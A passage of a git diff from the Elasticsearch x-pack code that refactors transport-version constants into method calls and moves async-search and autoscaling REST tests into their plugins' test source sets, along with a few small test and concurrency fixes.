org.elasticsearch.core.TimeValue; @@ -679,7 +678,7 @@ public void testCCSCheckCompatibility() throws Exception { SubmitAsyncSearchRequest request = new SubmitAsyncSearchRequest(new SearchSourceBuilder().query(new DummyQueryBuilder() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + return TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); } }), indexName); diff --git a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java index e69e19e4566ea..984cab338e14e 100644 --- a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java +++ b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/BlockingQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Weight; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.Queries; @@ -131,7 +130,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** diff --git a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java index d951b21ba1380..7cc43d43c6ff5 100644 --- a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java +++ b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/CrossClusterAsyncSearchIT.java @@ -1778,6 +1778,7 @@ public void testCancellationViaTimeoutWithAllowPartialResultsSetToFalse() throws } SearchListenerPlugin.waitLocalSearchStarted(); + SearchListenerPlugin.waitRemoteSearchStarted(); // ensure tasks are present on both clusters and not cancelled try { diff --git a/x-pack/plugin/async-search/qa/rest/src/javaRestTest/java/org/elasticsearch/qa/AsyncSearchHeadersIT.java b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchHeadersIT.java similarity index 95% rename from x-pack/plugin/async-search/qa/rest/src/javaRestTest/java/org/elasticsearch/qa/AsyncSearchHeadersIT.java rename to x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchHeadersIT.java index de2bfd4c98ec9..5fe2eabf43aab 100644 --- a/x-pack/plugin/async-search/qa/rest/src/javaRestTest/java/org/elasticsearch/qa/AsyncSearchHeadersIT.java +++ b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchHeadersIT.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.qa; +package org.elasticsearch.xpack.search; import org.elasticsearch.client.Request; import org.elasticsearch.client.Response; @@ -20,7 +20,7 @@ public class AsyncSearchHeadersIT extends ESRestTestCase { @ClassRule - public static ElasticsearchCluster cluster = ElasticsearchCluster.local().plugin("x-pack-async-search").build(); + public static ElasticsearchCluster cluster = ElasticsearchCluster.local().module("x-pack-async-search").build(); @Override protected String getTestRestCluster() { diff --git a/x-pack/plugin/async-search/qa/security/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java similarity index 99% rename from x-pack/plugin/async-search/qa/security/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java rename to x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java index c5736fb440586..453c721674e01 100644 --- a/x-pack/plugin/async-search/qa/security/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java +++ b/x-pack/plugin/async-search/src/javaRestTest/java/org/elasticsearch/xpack/search/AsyncSearchSecurityIT.java @@ -26,7 +26,6 @@ import org.elasticsearch.search.SearchHit; import org.elasticsearch.search.SearchResponseUtils; import org.elasticsearch.test.cluster.ElasticsearchCluster; -import org.elasticsearch.test.cluster.local.distribution.DistributionType; import org.elasticsearch.test.cluster.util.resource.Resource; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.ConstructingObjectParser; @@ -95,8 +94,9 @@ public class AsyncSearchSecurityIT extends ESRestTestCase { @ClassRule public static ElasticsearchCluster cluster = ElasticsearchCluster.local() - .distribution(DistributionType.DEFAULT) - .nodes(2) + .module("test-error-query") + .module("analysis-common") + .module("x-pack-async-search") .setting("xpack.license.self_generated.type", "trial") .setting("xpack.security.enabled", "true") .rolesFile(Resource.fromClasspath("roles.yml")) diff --git a/x-pack/plugin/async-search/qa/security/src/javaRestTest/resources/roles.yml b/x-pack/plugin/async-search/src/javaRestTest/resources/roles.yml similarity index 100% rename from x-pack/plugin/async-search/qa/security/src/javaRestTest/resources/roles.yml rename to x-pack/plugin/async-search/src/javaRestTest/resources/roles.yml diff --git a/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java b/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java index c87057a7cd2e1..3e0c949554421 100644 --- a/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java +++ b/x-pack/plugin/async-search/src/test/java/org/elasticsearch/xpack/search/CancellingAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.search; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilders; @@ -107,6 +106,6 @@ public BucketCardinality bucketCardinality() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java b/x-pack/plugin/async-search/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java similarity index 67% rename from x-pack/plugin/async-search/qa/rest/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java rename to x-pack/plugin/async-search/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java index cfcf2705c19c6..acc494318726b 100644 --- a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java +++ b/x-pack/plugin/async-search/src/yamlRestTest/java/org/elasticsearch/qa/AsyncSearchRestIT.java @@ -9,11 +9,19 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; +import org.elasticsearch.test.cluster.ElasticsearchCluster; import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; +import org.junit.ClassRule; public class AsyncSearchRestIT extends ESClientYamlSuiteTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("x-pack-test-deprecated-query") + .module("x-pack-async-search") + .build(); + public AsyncSearchRestIT(final ClientYamlTestCandidate testCandidate) { super(testCandidate); } @@ -22,4 +30,9 @@ public AsyncSearchRestIT(final ClientYamlTestCandidate testCandidate) { public static Iterable parameters() throws Exception { return ESClientYamlSuiteTestCase.createParameters(); } + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } } diff --git a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml b/x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml similarity index 100% rename from x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml rename to x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/10_deprecation.yml diff --git a/x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml b/x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml similarity index 100% rename from x-pack/plugin/async-search/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml rename to x-pack/plugin/async-search/src/yamlRestTest/resources/rest-api-spec/test/async-search/20_keep_alive.yml diff --git a/x-pack/plugin/autoscaling/build.gradle b/x-pack/plugin/autoscaling/build.gradle index 24400a0fc418e..22a43654fd602 100644 --- a/x-pack/plugin/autoscaling/build.gradle +++ b/x-pack/plugin/autoscaling/build.gradle @@ -1,5 +1,6 @@ apply plugin: 'elasticsearch.internal-es-plugin' apply plugin: 'elasticsearch.internal-cluster-test' +apply plugin: 'elasticsearch.internal-yaml-rest-test' esplugin { name = 'x-pack-autoscaling' @@ -15,15 +16,21 @@ base { dependencies { compileOnly project(path: xpackModule('core')) - testImplementation(testArtifact(project(xpackModule('core')))) - testImplementation project(':modules:data-streams') - testImplementation project(path: xpackModule('blob-cache')) - testImplementation project(path: xpackModule('searchable-snapshots')) - testImplementation project(path: xpackModule('ilm')) - testImplementation project(path: xpackModule('slm')) - testImplementation project(path: xpackModule('ccr')) + testImplementation testArtifact(project(':server')) + testImplementation testArtifact(project(xpackModule('core'))) testImplementation "com.fasterxml.jackson.core:jackson-databind:${versions.jackson}" + + internalClusterTestImplementation project(':modules:data-streams') + internalClusterTestImplementation project(xpackModule('blob-cache')) + internalClusterTestImplementation project(xpackModule("searchable-snapshots")) + internalClusterTestImplementation project(xpackModule('ilm')) + internalClusterTestImplementation project(xpackModule('slm')) + internalClusterTestImplementation project(xpackModule('ccr')) } -addQaCheckDependencies(project) +restResources { + restApi { + include '_common', 'autoscaling' + } +} diff --git a/x-pack/plugin/autoscaling/qa/rest/build.gradle b/x-pack/plugin/autoscaling/qa/rest/build.gradle deleted file mode 100644 index 903e76fd986cf..0000000000000 --- a/x-pack/plugin/autoscaling/qa/rest/build.gradle +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -dependencies { - yamlRestTestImplementation(testArtifact(project(xpackModule('core')))) -} - -restResources { - restApi { - include '_common', 'autoscaling' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.security.enabled', 'true' - setting 'xpack.license.self_generated.type', 'trial' - extraConfigFile 'roles.yml', file('autoscaling-roles.yml') - user username: 'autoscaling-admin', password: 'autoscaling-admin-password', role: 'superuser' - user username: 'autoscaling-user', password: 'autoscaling-user-password', role: 'autoscaling' -} diff --git a/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java b/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java index 9cb152a7ad401..ecf1c35059960 100644 --- a/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java +++ b/x-pack/plugin/autoscaling/src/main/java/org/elasticsearch/xpack/autoscaling/AutoscalingMetadata.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.autoscaling; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -114,7 +113,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -173,7 +172,7 @@ static Diff readFrom(final StreamInput in) throws IOE @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java b/x-pack/plugin/autoscaling/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java similarity index 67% rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java rename to x-pack/plugin/autoscaling/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java index 89bc24ecc1ed0..15bef71fe1ea5 100644 --- a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java +++ b/x-pack/plugin/autoscaling/src/yamlRestTest/java/org/elasticsearch/xpack/autoscaling/AutoscalingRestIT.java @@ -12,13 +12,24 @@ import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.ThreadContext; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; - -import static org.elasticsearch.xpack.core.security.authc.support.UsernamePasswordToken.basicAuthHeaderValue; +import org.junit.ClassRule; public class AutoscalingRestIT extends ESClientYamlSuiteTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .module("x-pack-autoscaling") + .setting("xpack.security.enabled", "true") + .setting("xpack.license.self_generated.type", "trial") + .rolesFile(Resource.fromClasspath("autoscaling-roles.yml")) + .user("autoscaling-admin", "autoscaling-admin-password", "superuser", false) + .user("autoscaling-user", "autoscaling-user-password", "autoscaling", false) + .build(); + public AutoscalingRestIT(final ClientYamlTestCandidate testCandidate) { super(testCandidate); } @@ -40,4 +51,8 @@ protected Settings restClientSettings() { return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", value).build(); } + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } } diff --git a/x-pack/plugin/autoscaling/qa/rest/autoscaling-roles.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/autoscaling-roles.yml similarity index 100% rename from x-pack/plugin/autoscaling/qa/rest/autoscaling-roles.yml rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/autoscaling-roles.yml diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml similarity index 100% rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/delete_autoscaling_policy.yml diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml similarity index 100% rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_capacity.yml diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml similarity index 100% rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/get_autoscaling_policy.yml diff --git a/x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml b/x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml similarity index 100% rename from x-pack/plugin/autoscaling/qa/rest/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml rename to x-pack/plugin/autoscaling/src/yamlRestTest/resources/rest-api-spec/test/autoscaling/put_autoscaling_policy.yml diff --git a/x-pack/plugin/build.gradle b/x-pack/plugin/build.gradle index 34b4f412e849a..2e771efed85d9 100644 --- a/x-pack/plugin/build.gradle +++ b/x-pack/plugin/build.gradle @@ -136,6 +136,7 @@ tasks.named("yamlRestCompatTestTransform").configure({ task -> task.skipTest("esql/191_lookup_join_on_datastreams/data streams not supported in LOOKUP JOIN", "Added support for aliases in JOINs") task.skipTest("esql/190_lookup_join/non-lookup index", "Error message changed") task.skipTest("esql/192_lookup_join_on_aliases/alias-pattern-multiple", "Error message changed") + task.skipTest("esql/10_basic/Test wrong LIMIT parameter", "Error message changed") }) tasks.named('yamlRestCompatTest').configure { diff --git a/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java b/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java index 7c47237d35bd5..6c56724a6f20a 100644 --- a/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java +++ b/x-pack/plugin/ccr/src/internalClusterTest/java/org/elasticsearch/xpack/ccr/CcrRepositoryIT.java @@ -21,6 +21,7 @@ import org.elasticsearch.action.bulk.BulkRequestBuilder; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.index.IndexRequest; +import org.elasticsearch.action.support.ActionTestUtils; import org.elasticsearch.action.support.ActiveShardCount; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.action.support.PlainActionFuture; @@ -51,6 +52,7 @@ import org.elasticsearch.snapshots.SnapshotId; import org.elasticsearch.snapshots.SnapshotShardSizeInfo; import org.elasticsearch.snapshots.SnapshotsInfoService; +import org.elasticsearch.test.ClusterServiceUtils; import org.elasticsearch.test.transport.MockTransportService; import org.elasticsearch.transport.TransportActionProxy; import org.elasticsearch.transport.TransportService; @@ -655,39 +657,39 @@ public void testCcrRepositoryFailsToFetchSnapshotShardSizes() throws Exception { try { final SnapshotsInfoService snapshotsInfoService = getFollowerCluster().getCurrentMasterNodeInstance(SnapshotsInfoService.class); + final ClusterService clusterService = getFollowerCluster().getCurrentMasterNodeInstance(ClusterService.class); final PlainActionFuture waitForAllShardSnapshotSizesFailures = new PlainActionFuture<>(); - final ClusterStateListener listener = event -> { - if (RestoreInProgress.get(event.state()).isEmpty() == false && event.state().routingTable().hasIndex(followerIndex)) { - try { - final IndexRoutingTable indexRoutingTable = event.state().routingTable().index(followerIndex); - // this assertBusy completes because the listener is added after the InternalSnapshotsInfoService - // and ClusterService preserves the order of listeners. - assertBusy(() -> { - List sizes = indexRoutingTable.shardsWithState(ShardRoutingState.UNASSIGNED) - .stream() - .filter(shard -> shard.unassignedInfo().lastAllocationStatus() == AllocationStatus.FETCHING_SHARD_DATA) - .sorted(Comparator.comparingInt(ShardRouting::getId)) - .map(shard -> snapshotsInfoService.snapshotShardSizes().getShardSize(shard)) - .filter(Objects::nonNull) - .filter(size -> ShardRouting.UNAVAILABLE_EXPECTED_SHARD_SIZE == size) - .collect(Collectors.toList()); - assertThat(sizes, hasSize(numberOfShards)); - }); - waitForAllShardSnapshotSizesFailures.onResponse(null); - } catch (Exception e) { - throw new AssertionError("Failed to retrieve all snapshot shard sizes", e); - } + ClusterServiceUtils.addTemporaryStateListener( + clusterService, + state -> RestoreInProgress.get(state).isEmpty() == false && state.routingTable().hasIndex(followerIndex) + ).addListener(ActionTestUtils.assertNoFailureListener(ignore -> { + try { + // This listener runs synchronously in the same thread so that clusterService.state() returns the same state + // that satisfied the predicate. + final IndexRoutingTable indexRoutingTable = clusterService.state().routingTable().index(followerIndex); + // this assertBusy completes because the listener is added after the InternalSnapshotsInfoService + // and ClusterService preserves the order of listeners. + assertBusy(() -> { + List sizes = indexRoutingTable.shardsWithState(ShardRoutingState.UNASSIGNED) + .stream() + .filter(shard -> shard.unassignedInfo().lastAllocationStatus() == AllocationStatus.FETCHING_SHARD_DATA) + .sorted(Comparator.comparingInt(ShardRouting::getId)) + .map(shard -> snapshotsInfoService.snapshotShardSizes().getShardSize(shard)) + .filter(Objects::nonNull) + .filter(size -> ShardRouting.UNAVAILABLE_EXPECTED_SHARD_SIZE == size) + .collect(Collectors.toList()); + assertThat(sizes, hasSize(numberOfShards)); + }); + waitForAllShardSnapshotSizesFailures.onResponse(null); + } catch (Exception e) { + throw new AssertionError("Failed to retrieve all snapshot shard sizes", e); } - }; - - final ClusterService clusterService = getFollowerCluster().getCurrentMasterNodeInstance(ClusterService.class); - clusterService.addListener(listener); + })); logger.debug("--> creating follower index [{}]", followerIndex); followerClient().execute(PutFollowAction.INSTANCE, putFollow(leaderIndex, followerIndex, ActiveShardCount.NONE)); waitForAllShardSnapshotSizesFailures.get(30L, TimeUnit.SECONDS); - clusterService.removeListener(listener); assertThat(simulatedFailures.get(), equalTo(numberOfShards)); diff --git a/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java b/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java index 8cb98bb4458aa..6a7d6464a6826 100644 --- a/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java +++ b/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.ccr; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.ActionFilters; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -90,7 +89,7 @@ public Usage(StreamInput in) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public int getNumberOfFollowerIndices() { diff --git a/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java b/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java index 644a2a074ac59..ee49dfcda3f78 100644 --- a/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java +++ b/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java @@ -182,7 +182,8 @@ public final void startClusters() throws Exception { 0, "leader", mockPlugins, - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); leaderCluster.beforeTest(random()); leaderCluster.ensureAtLeastNumDataNodes(numberOfNodesPerCluster()); @@ -204,7 +205,8 @@ public final void startClusters() throws Exception { 0, "follower", mockPlugins, - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); clusterGroup = new ClusterGroup(leaderCluster, followerCluster); diff --git a/x-pack/plugin/core/build.gradle b/x-pack/plugin/core/build.gradle index 41ff487d760da..6a17216946d1a 100644 --- a/x-pack/plugin/core/build.gradle +++ b/x-pack/plugin/core/build.gradle @@ -70,7 +70,7 @@ dependencies { testImplementation project(path: ':modules:rest-root') testImplementation project(path: ':modules:health-shards-availability') // Needed for Fips140ProviderVerificationTests - testCompileOnly('org.bouncycastle:bc-fips:1.0.2.5') + testCompileOnly('org.bouncycastle:bc-fips:1.0.2.6') testImplementation(project(':x-pack:license-tools')) { transitive = false diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java index 81852fbbb5b61..e719103b9b669 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java @@ -7,7 +7,6 @@ package org.elasticsearch.license; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.NamedDiff; import org.elasticsearch.cluster.metadata.Metadata; @@ -108,7 +107,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java index 3c7b089b4cd63..6b9b8266ae8b9 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java @@ -447,7 +447,13 @@ public String statusDescription() { void featureUsed(LicensedFeature feature) { checkExpiry(); - usage.put(new FeatureUsage(feature, null), epochMillisProvider.getAsLong()); + final long now = epochMillisProvider.getAsLong(); + final FeatureUsage feat = new FeatureUsage(feature, null); + final Long mostRecent = usage.get(feat); + // only update if needed, to prevent ConcurrentHashMap lock-contention on writes + if (mostRecent == null || now > mostRecent) { + usage.put(feat, now); + } } void enableUsageTracking(LicensedFeature feature, String contextName) { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java index 0e185a90ed39b..67df2b34c4c1f 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java @@ -60,6 +60,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, tierPreference); } + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getTierPreference(); + } + @Override public Query existsQuery(SearchExecutionContext context) { String tierPreference = context.getTierPreference(); diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java index 28f8b2013892e..e320b190740e1 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.aggregatemetric; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.xpack.core.XPackFeatureUsage; import org.elasticsearch.xpack.core.XPackField; @@ -28,7 +27,7 @@ public AggregateMetricFeatureSetUsage(boolean available, boolean enabled) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java index 84ada6b985af8..17ec143d80f78 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.analytics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -48,7 +47,7 @@ protected void innerXContent(XContentBuilder builder, Params params) throws IOEx @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java index 2236304d8c4d0..1a0254f7d8471 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java @@ -12,6 +12,7 @@ import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.action.ActionListener; +import org.elasticsearch.action.update.UpdateResponse; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.service.ClusterService; import org.elasticsearch.common.TriFunction; @@ -86,23 +87,10 @@ public void retrieveResult(GetAsyncResultRequest request, ActionListener 0) { - store.updateExpirationTime( - searchId.getDocId(), + updateExpirationTime( + searchId, expirationTime, - ActionListener.wrap(p -> getSearchResponseFromTask(searchId, request, nowInMillis, expirationTime, listener), exc -> { - RestStatus status = ExceptionsHelper.status(ExceptionsHelper.unwrapCause(exc)); - if (status != 